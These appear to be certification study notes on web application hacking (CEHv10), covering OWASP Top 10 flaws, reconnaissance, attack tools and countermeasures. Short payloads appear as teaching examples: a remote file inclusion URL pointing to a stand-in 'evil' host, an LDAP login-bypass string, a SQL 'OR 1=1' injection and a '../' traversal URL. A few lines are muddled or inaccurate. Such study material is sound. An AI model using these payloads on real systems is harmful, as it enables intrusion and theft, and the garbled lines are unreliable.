CEHv10: Hacking Web Applications
File Injection Attack
A technique used to exploit "dynamic file include" mechanisms in web applications. It exploits vulnerable scripts on the server to make them use a remote file instead of a trusted file from the local file system.
Web Crawling via Mozenda
It crawls through a website and harvests pages of information. The software supports logins, result index, AJAX, borders, and others.
Other tools:
o Octoparse
o crawler4j
o Giant Web Crawl
OWASP A3: Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII (Personal Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
- Weak encryption code
Map the Attack Surface
Once attackers detect the entry points, server-side technologies, and functionalities, they then find their respective vulnerabilities and plan the attack surface area of the target web app. Web application analysis thus helps attackers narrow down the attack surface they need to target. Attackers consider the following factors to plan their attack.
Steps of Fuzz Testing
Steps involved in performing the attack:
- Identify the target system
- Identify inputs
- Generate fuzzed data
- Execute the test using fuzz data
- Monitor system behavior
- Log defects
Server ID/Banner Grabbing
Through this, attackers identify the name and/or version of a server, operating system, or application.
Tools:
o Telnet
o Netcat
o ID Serve
o Netcraft
Fuzz Testing Tools
o WSFuzzer
o WebScarab
o Burp Suite
o AppScan
o Peach Fuzzer
Vulnerability Stack
Attackers make use of vulnerabilities of one or more elements among the seven levels to exploit them and gain unrestricted access to an application or to the entire network.
Layer 7 - Business Logic flaws
- Technical vulnerability: exploit vulnerabilities by performing input validation attacks such as XSS
Layer 6 - Open source/Commercial
- Third-party components are services that integrate with the website to achieve certain functionality
- Attackers exploit this redirection and use it as a medium/pathway to enter Amazon.com and exploit it
Layer 5 - Apache/Microsoft IIS
- Attackers can employ footprinting on a web server, which hosts the target website, and grab banners that contain information such as the web server name and its version
Layer 4 - Oracle/MySQL/MS SQL
- Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars
Layer 3 - Windows/Linux/OS X
- Attackers scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them
Layer 2 - Routers/Switches
- Attackers flood these switches with a huge number of requests that exhaust the CAM table, leading it to behave like a hub
Layer 1 - IDS/IPS
- Attackers evade intrusion detection systems, so that while exploiting the target, the IDS/IPS does not trigger any alarm
OWASP A9: Using Components w/ Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
OWASP A4: XML External Entity (XXE)
External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.
- Server-side request forgery (SSRF) attack
Attack Authentication Mechanism
Generally, web applications authenticate users through authentication mechanisms such as login functionality.
o Attackers can enumerate user names in two ways: verbose failure messages (need password and user name) and predictable user names (auto generated).
o Password attack
- THC-Hydra
- cracker
o Session Attack
o Cookie Exploitation
o Cookie sniffing
o Cookie replay
- OWASP Zed Attack Proxy
- L0phtCrack
- cookie exploitation tools
OWASP A1: Injection
Injection flaws, such as SQL, command injection, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query.
SQL Injection - uses an ALL CAPS cmd syntax; most common
Command Injection - shell, HTML, file injection; highly dangerous
LDAP Injection - cn=GSnowden40 ou=IT dc=CEH dc=com
Watcher Web Security Tool
This tool is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. It acts as an assistant to the developer or pen-tester by quickly identifying issues that commonly lead to security problems in web apps. Integrate it into your test passes to achieve more coverage of security testing goals.
Directory Traversal Countermeasure
o Define access rights to the protected areas of the website
o Apply checks/hot fixes that prevent exploitation of the vulnerability, such as Unicode encoding used to affect directory traversal
o Web servers should be updated with security patches in a timely manner
Insecure Deserialization Countermeasure
o Validate untrusted input which is to be serialized to ensure serialized data contains only trusted classes
o Deserialization of trusted data must cross a trust boundary
o Developers must re-architect their applications
o Avoid serialization for security-sensitive classes
o Guard sensitive data during deserialization
o Filter untrusted serial data
o Duplicate Security Manager checks enforced in a class during serialization and deserialization
o Understand the security permissions given to serialization and deserialization
More Web Application Threats
Cookie Snooping
- Attackers use cookie snooping on victim systems to analyze users' surfing habits and sell that information to other attackers or to launch various attacks on the victims' web applications.
Hidden Field Manipulation
- Attackers attempting to compromise e-commerce websites mostly use these types of attacks. They manipulate hidden fields and change the data stored in them. Several online stores face this type of problem every day.
- Attackers can alter prices and conclude transactions, designating the prices of their choice.
Authentication Hijacking
- To identify a user, every web application employs a user identification method such as an ID and password. However, once attackers compromise a system, various malicious things such as session hijacking and user impersonation can occur.
Obfuscation Application
- Attackers usually work hard at hiding their attacks and avoiding detection.
- Network and host-based intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected.
- The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, Base64, or URL encoding.
- Unicode is a method of representing letters, numbers, and special characters to properly display them, regardless of the application or underlying platform.
Broken Session Management
- When security-sensitive credentials such as passwords and other important data are not properly secured, attackers can easily compromise them.
Broken Account Management
- Vulnerable account management functions, including account update, forgotten or lost password recovery or reset, and other similar functions, might weaken valid authentication schemes.
Denial-of-Service (DoS)
- A denial-of-service or DoS attack is an attack on the availability of a service that reduces, restricts, or prevents accessibility of system resources to its legitimate users.
- For instance, a website related to a banking or email service is not able to function for a few hours or even days, resulting in loss of time and money.
Cookie/Session Poisoning
-By changing the information inside a cookie, attackers bypass the authentication process; once they gain control over a network, they can modify its content, use the system for a malicious attack, or steal information from users' systems. In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits them to the web server. One of the easiest examples involves using the cookie directly for authentication.
Analyze Web Applications
1. The first step in analyzing a web app is to check for the application entry point, which can later serve as a gateway for attacks.
2. Identify Server-Side Technologies: Server-side technologies or server-side scripting systems are used to generate dynamic web pages (web 2.0) requested by clients and are stored internally on the server.
3. Identify Server-Side Functionality: Server-side functionality refers to the ability of a server to execute programs on output web pages. User requests stimulate the scripts residing on the web server to display interactive web pages or websites. The server executes server-side scripts, which are invisible to the user.
4. Map the Attack Surface: Attackers then plan the attack surface area of the web app to target the specific, vulnerable area. Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.
Web Applications
Software programs that run on web browsers and act as the interface between users and web servers through web pages. Though these have certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking,
Bypass Client-side Control
A web application requires client-side controls to restrict user inputs when transmitting data via client components and to implement measures controlling the user's interaction with his or her own client.
Techniques to bypass the client-side controls:
- Attack Hidden Form Fields: Identify hidden form fields in the web page and manipulate the tags and fields to exploit the web page before transmitting the data to the server.
- Attack Browser Extensions: Attempt to intercept the traffic from the browser extensions or decompile the browser extensions to capture user data.
- Perform Source Code Review: Perform source code review to identify vulnerabilities in the code that cannot be identified by the traditional vulnerability scanning tools.
Web Services Atk
A web service can interact directly with the web application without the need for an interactive user session or a browser.
- Attackers can get into the target web applications by exploiting an application integrated with vulnerable web services. An attacker injects a malicious script into a web service and is able to disclose and modify application data.
Burp Suite
An integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. It contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, sequencer tool, and more.
Identify Server-side Technologies
- Analyze HTTP headers and HTML source code
- Examine URLs, error page messages, and session tokens
httprint - a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or servermask.
OWASP A2: Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume other users' identities (temporarily or permanently).
- Session ID in URLs
- Pwd Exploit
- Timeout Exploit
Identify Entry Points for User Input
Attackers examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields. Use the following tools to analyze the web application:
o httprint (http://www.net-square.com)
o Burp Suite (https://portswigger.net)
o WebScarab (https://www.owasp.org)
o OWASP Zed Attack Proxy (https://www.owasp.org)
o GNU Wget (https://www.gnu.org)
Web Services Footprinting Attack
Attackers use the Universal Business Registry (UBR) as a major source to gather information about web services, as it is very useful for both businesses and individuals. Attackers can footprint a web application to obtain any or all of these UDDI information structures:
- XML Query
- XML Response
Hidden Field Manipulation
Attackers use these against e-commerce websites, as most of these sites have hidden fields in price and discount specifications. The selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields in the HTML code, which are submitted via GET or POST.
Attack Database Connectivity
Attacking data connectivity can result in unauthorized control over the database. Attacks on data connectivity provide attackers with access to sensitive database information. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.
Example of a common connection string used to connect to a Microsoft SQL Server database:
*"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"*
Even more Web Application Threats
Buffer Overflow
- A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
CAPTCHA Attacks
- CAPTCHA is a challenge-response type test implemented by web applications to determine whether the response is generated by a computer or not. Though these CAPTCHAs are designed to be unbreakable, they are prone to various types of attacks.
Platform Exploits
- Users can build various web applications by using different platforms such as BEA WebLogic and ColdFusion. Each platform has its various vulnerabilities and exploits associated with it.
Network Access Attacks
- Network access attacks can majorly affect web applications, including the basic level of service. They can also allow levels of access that standard HTTP application methods could not grant.
DMZ Protocol Attacks
- The DMZ ("demilitarized zone") is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network.
- An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems.
Detecting WAF and Proxies on Target Site
When footprinting a target that sits behind a proxy, the attempt returns the proxy's IP address, not the server's legitimate address.
- Use the TRACE method
Web application firewalls (WAFs) are security devices deployed between the client and server. These devices are like intrusion prevention systems that provide security for web applications against a wide range of attacks.
WAFW00F - allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website. It detects the WAF at any domain.
Service Discovery
Footprinting the web infrastructure provides data about the services offered, such as exchange and encryption of data, path of transmission, and protocols deployed.
nmap
- A multi-platform, multi-purpose application used to perform footprinting of ports, services, operating systems, etc.
- It is used for network discovery and security auditing.
Other tools:
o NetScan Tools Pro
o Sandcat Browser
Example of LDAP
If an attacker enters the valid user name "certifiedhacker" and injects *certifiedhacker)(&))*, the URL string becomes *(&(USER=certifiedhacker)(&))(PASS=blah))*. Only the first filter is processed by the LDAP server, i.e., only the query *(&(USER=certifiedhacker)(&))* is evaluated. This query is always true, and the attacker logs into the system without a valid password.
Attack Application Logic Flaws
In all web applications, a vast amount of logic is applied at every level. The implementation of some of this logic can be vulnerable to various attacks without being noticeable. Most application flaws arise from the negligence and false assumptions of the developers. Application logic flaws differ between different types of web applications and are not restricted to a particular flaw.
- Scenario: Identify and exploit logic flaws in retail web applications
Attack Authorization Schemes
In this attack, the attacker first finds a legitimate account with limited privileges, then logs in as that user, and gradually escalates privileges to access protected resources. Attackers use sources such as uniform resource identifiers, parameter tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform authorization attacks.
How to Defend Against LDAP Injection Attacks
LDAP injection is similar to SQL injection: attacks on web apps co-opt user input to create LDAP queries.
o Perform type, pattern, and domain value validation on all input data
o Make the LDAP filter as specific as possible
o Validate and restrict the amount of data returned to the user
o Implement tight access control on the data in the LDAP directory
o Perform dynamic testing and source code analysis
Perform Injection Attacks
Injection attacks are very common in web applications; they exploit the vulnerable input validation mechanism implemented by the web application.
Types:
o Web Scripts Injection: If user input is used in dynamically executed code, enter crafted input that breaks the intended data context and executes commands on the server.
o OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command.
o SMTP Injection: Inject arbitrary SMTP commands into the application and SMTP server conversation to generate large volumes of spam email.
o SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
o LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases.
o XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.
o Buffer Overflow: Inject a large amount of bogus data beyond the capacity of the input field.
o Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)" to access restricted directories in the application.
OWASP A10: Insufficient Logging/Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Web Spidering Using Burp Suite
It is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. It allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. Configure -> Proxy intercept -> intercept off -> visiting every single link/URL -> Target -> Spider this host /branch -> confirm -> Yes
Web 2.0 Applications
It refers to technologies that use dynamic web pages, thus superseding the Web 1.0 technology, which used static HTML web pages.
- Latest generation of web apps. Facilities:
Interoperability
o Blogs (Wordpress)
o Advanced gaming
o Dynamic as opposed to static site content
o RSS-generated syndication
User-centered Design
o Social networking sites (Facebook, Twitter, LinkedIn, etc.)
o Mash-ups (Emails, IMs, Electronic payment systems)
o Wikis and other collaborative applications
o Google Base and other free Web services (Google Maps)
Collaboration on the Web
o Cloud computing websites like (amazon.com)
o Interactive encyclopedias and dictionaries
o Online office software (Google Docs and Microsoft Silverlight)
o Ease of data creation, modification, or deletion by individual users
Interactive Data Sharing
o New technologies like AJAX (Gmail, YouTube)
o Mobile application (iPhone)
o Flash rich interface websites
o Frameworks (Yahoo! UI Library, jQuery)
Fuzz Testing Strategies
Mutation-Based:
- In this type of testing, the current data samples create new test data, and the new test data is again mutated to generate further random data. This type of testing starts with a valid sample and keeps mutating until the target is reached.
Generation-Based:
- In this type of testing, new data is generated from scratch, and the amount of data to be generated is predefined based on the testing model.
Protocol-Based:
- In this type of testing, a protocol fuzzer sends forged packets to the target application that is to be tested.
- This type of testing requires detailed knowledge of the protocol format being tested.
- This type of testing involves writing a list of specifications into the fuzzer tool and then performing the model-based test generation technique to go through all the listed specifications and add irregularities in the data contents, sequence, etc.
ID Server-side Functionality
Once server-side technologies are determined, attackers try to identify server-side functionality for the purpose of finding potential vulnerabilities. They examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
o GNU Wget - for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, and terminals without X-Windows support.
o BlackWidow (http://softbytelabs.com)
o Teleport Pro (http://www.tenmax.com)
OWASP A5: Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced.
- Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access rights, etc.
- Privilege escalation
Web Services XML Poisoning
This is similar to an SQL injection attack. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic.
Types of command injection attacks
Shell Injection
o An attacker tries to craft an input string to gain shell access to a web server
o Shell injection functions include *system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start()*, and similar APIs
HTML Embedding
o This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application
o In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting
File Injection
o The attacker exploits this vulnerability and injects malicious code into system files
*http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evil/exploit?*
Web Service Attack Tools
SoapUI Pro - a web service testing tool which supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. Attackers can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks.
Altova XMLSpy - the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
Web Application Pen testing
Step 1: Define objective
You should define the aim of the penetration test before conducting it. This would help you to move in the right direction towards your aim of the penetration test.
Step 2: Information gathering
You should gather as much information as possible about your target system or network.
Step 3: Configuration management testing
Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you to protect against known vulnerabilities by installing the latest updates.
Step 4: Authentication testing
Test the authentication mechanism of the application by trying to bypass the authentication mechanism by any means and to determine the possible exploits in it.
Step 5: Session management testing
Perform session management testing to check your web application against various attacks that an attacker carries out on session IDs, such as session hijacking, session fixation, and so on.
Step 6: Denial-of-service testing
Send a vast amount of requests to the web application until the server is saturated. Analyze the behavior of the application when the server is saturated. In this way, you can test your web application against denial-of-service attacks.
Step 7: Data validation testing
Failing to adopt a proper data validation method is a common security weakness observed in most web applications, which can further lead to major vulnerabilities. Thus, before a hacker finds those vulnerabilities and exploits your application, you must perform data validation testing and protect it.
Step 8: Business logic testing
Web application security flaws may be present even in the context of business logic, such as improper error handling. Try to exploit such flaws. Attackers may do something that a business does not allow, which could in turn lead to great financial losses. Testing business logic for security flaws often requires unconventional thinking.
Step 9: Authorization testing
Analyze how a web application authorizes users, then try to find and exploit the vulnerabilities present in the authorization mechanism. For example, once authenticated by the application, you should try to escalate your privileges to access sensitive areas such as an admin page.
Step 10: Web services testing
Web services use the HTTP protocol in conjunction with XML, WSDL, SOAP, and UDDI technologies. Therefore, they have XML parser-related vulnerabilities in addition to SQL injection, information disclosure, and so on. You should conduct web services testing to determine their vulnerabilities.
Step 11: AJAX testing
Though developers develop more responsive web applications using AJAX, it is likely that they are just as vulnerable as traditional web applications. Testing for AJAX is challenging, because developers are given full freedom to design the method of client-server communication.
Step 12: Document all the findings
Once you conduct all the tests mentioned above, document all your findings and the testing techniques you employed at each step. Analyze the document, explain the current security posture to the concerned parties, and suggest how they can enhance their security.
Attack Access Control
Access control is the part of an application's security mechanisms that is logically built on authentication and session management.
o Parameter-Based Access Control:
- Any web application consists of various request parameters like cookies, query string parameters, etc. The application decides whether to grant access to a request based on these parameters.
o Referer-Based Access Control:
- In some web applications, the HTTP referer is the foundation for major access control decisions.
- As the HTTP referer is considered unsafe, attackers manipulate it to any value.
o Location-Based Access Control:
- The user's geographic location can be determined by various methods. The most common method to determine current location is through the IP address.
- Attackers can bypass location-based access controls by using web proxies, a VPN, a data-roaming-enabled mobile device, direct manipulation of mechanisms, etc.
Encoding Schemes
The process of converting source information into its equivalent symbolic form, which helps in hiding the meaning of data.
Types:
o URL Encoding - "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:
- %3d ( = )
- %0a ( New line )
- %20 ( space )
o HTML Encoding - used to represent unusual characters so that they can be safely combined within an HTML document.
- &amp; ( & )
- &lt; ( < )
- &gt; ( > )
o Unicode encoding - is of two types: 16-bit Unicode Encoding and UTF-8.
- 16-bit Unicode Encoding - replaces unusual Unicode characters with "%u" followed by the character's Unicode codepoint expressed in hexadecimal.
- UTF-8 - a variable-length encoding standard in which each byte is expressed in hexadecimal and preceded by the % prefix.
o Base64 encoding scheme - represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP and also for encoding user credentials.
o Hex Encoding - the HTML encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.
How to Defend Against Command Injection Flaws
The simplest way to protect against command injection flaws is to avoid them wherever possible.
o Perform input validation
o Escape dangerous characters
o Use language-specific libraries that avoid problems due to shell commands
o Perform input and output encoding
o Use a safe API which avoids the use of the interpreter entirely
o Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
o Use parameterized SQL queries
o Use modular shell disassociation from kernel
OWASP A8: Insecure Deserialization
These flaws occur when an application receives hostile serialized objects.
- Leads to remote code execution.
Attackers inject malicious code into serialized linear formatted data and forward the malicious serialized data to the victim. Due to insecure deserialization, the injected malicious code goes undetected and is present in the final execution of the deserialization code.
Data serialization (graphic -> code) and deserialization (code -> graphic) is an effective process of linearizing and de-linearizing data objects in order to transport them to other networks or systems. Deserialization is the reverse process of serialization, where the object data is recreated from the linear serialized data format.
Hidden Content Discovery
This allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.
Web Spidering
- Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses
o OWASP Zed Attack Proxy - Attacker Directed
o Burp Suite
Brute Force
- Make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality
o WebScarab
o Scrapy
LDAP injection attack
LDAP is a directory service that stores and organizes information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP (Lightweight Directory Access Protocol) is based on the client-server model, and clients can search the directory entries using filters.
Unvalidated Redirects and Forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.
- Attackers lure victims and make them click on unvalidated links that appear to be legitimate.
- Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information.
Unsafe forwards may allow access control bypass, leading to:
o Session Fixation Attack
o Security Management Exploits
o Failure to Restrict URL Access
o Malicious File Execution
Directory Traversal
This gives attackers access to restricted directories; they execute commands outside the web server's root directory. This attack exposes the directory structure of an application and often the underlying web server and operating system.
Example: The following uses "../" to go back several directories and obtain a file containing the backup of a web application:
http://www.targetsite.com/../../../sitebackup.zip
Web Application Architecture
This includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It comprises three layers:
1. Client or presentation layer
2. Business logic layer
3. Database layer
Attack Session Management Mechanism
This involves exchanging sensitive information between the server and its clients wherever required. Session prediction occurs when attackers identify a pattern in the session tokens exchanged between client and server. This can happen when the web application uses weak, predictable session identifiers. For example, when the web application assigns session tokens sequentially, attackers can predict the previous and next session tokens by knowing any one session ID. Before predicting a session identifier, attackers have to obtain enough valid session tokens for legitimate system users.
Session ID sniffing - Wireshark
WebScarab
This is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. This framework has the following plugins:
o Fragments
o Proxy
o Manual intercept
o Beanshell
o Bandwidth simulator
o Spider
o SessionID analysis
o Parameter "fuzzer"
o SOAP
o XSS/CRLF
Waterhole Attack
This is a type of unvalidated redirect attack in which the attacker first identifies the most visited website of the target, identifies the vulnerabilities in that website, injects malicious code into the vulnerable web application, and waits for the victim to browse the website. Once the victim accesses the website, the malicious code executes, infecting the victim.
OWASP A6: Security Misconfiguration
This is the most common issue in web security, due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, and not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all).
- Unvalidated inputs
- Parameter/Form tampering
- Improper Error Handling
- Insufficient Transport Layer Protection
Client or presentation layer
This layer of the Web Application Architecture includes all physical devices present on the client side, such as laptops, smart phones, and computers.
Database Layer
This layer of the Web Application Architecture is comprised of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in structured form (e.g., MS SQL Server, MySQL server).
Business logic layer
This layer of the Web Application Architecture is comprised of two layers: the web-server logic layer and the business logic layer.
- The web-server logic layer contains various components, such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and hardware components such as the server. It holds all the code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).
- The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware" technologies. It stores the application data and integrates legacy applications with the latest functionality of the application.
Cross-Site Request Forgery (CSRF or XSRF) Attack
This method is a kind of attack in which an authenticated user is made to perform certain tasks on the web application that an attacker chooses, for example by clicking on a particular link sent through an email or chat. Also known as a one-click attack, it occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious web page. Financially related websites commonly contain CSRF vulnerabilities.
SQL injection attack
This occurs when users enter a SQL statement into a form in which they are supposed to enter a name or other data. For example, the following SQL statement:
SELECT * FROM tablename WHERE UserID= 2302
becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID= 2302 OR 1=1
The expression "OR 1=1" evaluates to TRUE, often allowing the enumeration of all user ID values from the database.
Acunetix Web Vulnerability Scanner
This tool checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port-scans a web server and runs security checks against network services, and tests web forms and password-protected areas. It includes an automatic client script analyzer, allowing for security testing of Ajax and Web 2.0 apps.
Netsparker
This tool finds and reports web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) on all types of web applications, regardless of the platform and technology they are built with. Features:
o Automatic Detection: Automatically detect XSS, SQL Injection and other web application vulnerabilities.
o Dead Accurate: Use your time fixing vulnerabilities and not verifying the scanner's findings.
o Scalable: Easily scan 100s and 1000s of web applications simultaneously with a fully scalable service.
o Integration: Easily integrate web security scanning in the SDLC and continuous development systems.
CookieDigger
This tool helps identify weak cookie generation and insecure implementations of session management by web applications. It works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.
Server Discovery
To footprint a web infrastructure, you first need to discover active Internet servers. Three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
Whois lookup - allows you to gather information about a domain with the help of DNS and WHOIS queries.
o Netcraft
o SmartWhois
o DNSstuff Toolbox
DNS interrogation - DNS is a distributed database used to connect IP addresses with their respective hostnames and vice versa. It provides information about the location and type of servers.
o DNSstuff Toolbox
o Network-Tools.com
o Dig
o NsLookup
Port scan - attempts to connect to a particular set of TCP or UDP ports to find out which services exist on the server.
o Nmap
o NetScan
o Hping
o Advanced Port Scanner
dotDefender
Web Application Firewall
This is a software-based Web Application Firewall that protects your website from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in web site defacement. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior. Features:
o Handles .NET security issues
o Enterprise-class security against known and emerging hacking attacks
o Solutions for hosting, enterprise, and SMB/SME
o Supports multiple platforms and technologies (IIS, Apache, Cloud, etc.)
o Open API for integration with management platforms and other applications
o Prevents denial-of-service (DoS) attacks
Attack Web Services
Web Services Probing Attacks - WSDL files are automated documents comprising sensitive information about service ports, connections formed between two electronic machines, and so on. Attackers can use WSDL probing attacks to obtain information about vulnerabilities in public and private web services, as well as to perform SQL attacks.
Web Service Attacks - SOAP Injection: Simple Object Access Protocol (SOAP) is a lightweight and simple XML-based protocol designed to exchange structured and typed information on the web.
Web Service Attacks - XML Injection: Web applications sometimes use XML to store data such as user credentials in XML documents; attackers can parse and view such data using XPATH. XPATH defines the flow of the document and verifies user credentials, such as the username and password, to redirect to a specific user account.
Web Services Parsing Attacks - Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing.
- A parsing attack occurs when an attacker succeeds in modifying a file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.
Attack Web Servers
Web server vulnerabilities provide attackers with a path to exploit the web apps hosted on them.
o WebInspect - an automated and configurable web application security and penetration-testing tool that mimics real-world hacking techniques and attacks, enabling attackers to analyze complex web applications and services for security vulnerabilities.
o Metasploit
o Nikto
o Nessus
o Acunetix
Command Injection Attack
This occurs when input is used in the construction of a command that is subsequently executed by the system with the privileges of the web server. These flaws allow attackers to pass malicious code to different systems via web applications.
OWASP A7: Cross-site Scripting Atk (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create JavaScript.
- It allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
- It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering.
XSS can be used for:
- attack emails
- stealing user cookies
- sending an unauthorized request
XSSed archive
Waterhole attack countermeasures
o Apply software patches regularly to remove any vulnerabilities
o Monitor network traffic
o Secure the DNS server to prevent attackers from redirecting the site to a new location
o Analyze user behavior
o Inspect popular websites
o Use browser plug-ins that block HTTP redirects
o Disable third-party content such as advertising services, which track user activities
Access Controls Attack Methods
o Attack with different user accounts
o Attack Multistage Processes
- In a multistage process, multiple requests are sent to the server from the client. To attack such a process, each and every request to the server should be captured and tested for access controls.
o Attack Static Resources
- Identify web applications where protected static resources are accessed by URLs. Attempt to request these URLs directly and check whether they provide access to unauthorized users.
o Attack Direct Access Methods
- Web applications accept certain requests that provide direct access to server-side APIs. If there are any access control weaknesses in these direct access methods, an attacker can exploit the weakness and compromise the system.
o Attack Restrictions on HTTP Methods
- It is important to test different HTTP methods such as GET, POST, PUT, DELETE, TRACE, OPTIONS, etc.
- Attackers modify the HTTP method to compromise web applications. If the web application accepts these modified requests, this can bypass access controls.
XML External Entity Countermeasures
o Avoid processing XML input containing references to external entities with a weakly configured XML parser
o The XML unmarshaller should be configured securely
o Parse the document with a securely configured parser
o Configure the XML processor to use a local static DTD and disable any declared DTD included in the XML document
o Disable the DOCTYPE tag or use input validation to block input containing it
Web Service Attack Countermeasures
o Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
o Use document-centric authentication credentials that use SAML
o Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security
o Deploy web services-capable firewalls capable of SOAP and ISAPI level filtering
o Configure firewalls/IDS systems for web services anomaly and signature detection
o Configure firewalls/IDS systems to filter improper SOAP and XML syntax
o Implement centralized in-line request and response schema validation
o Block external references and use pre-fetched content when de-referencing URLs
o Maintain and update a secure repository of XML schemas
Security Misconfiguration Countermeasures
o Configure all security mechanisms and disable all unused services
o Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords
o Scan for the latest security vulnerabilities and apply the latest security patches
o Non-SSL requests to web pages should be redirected to the SSL page
o Set the 'secure' flag on all sensitive cookies
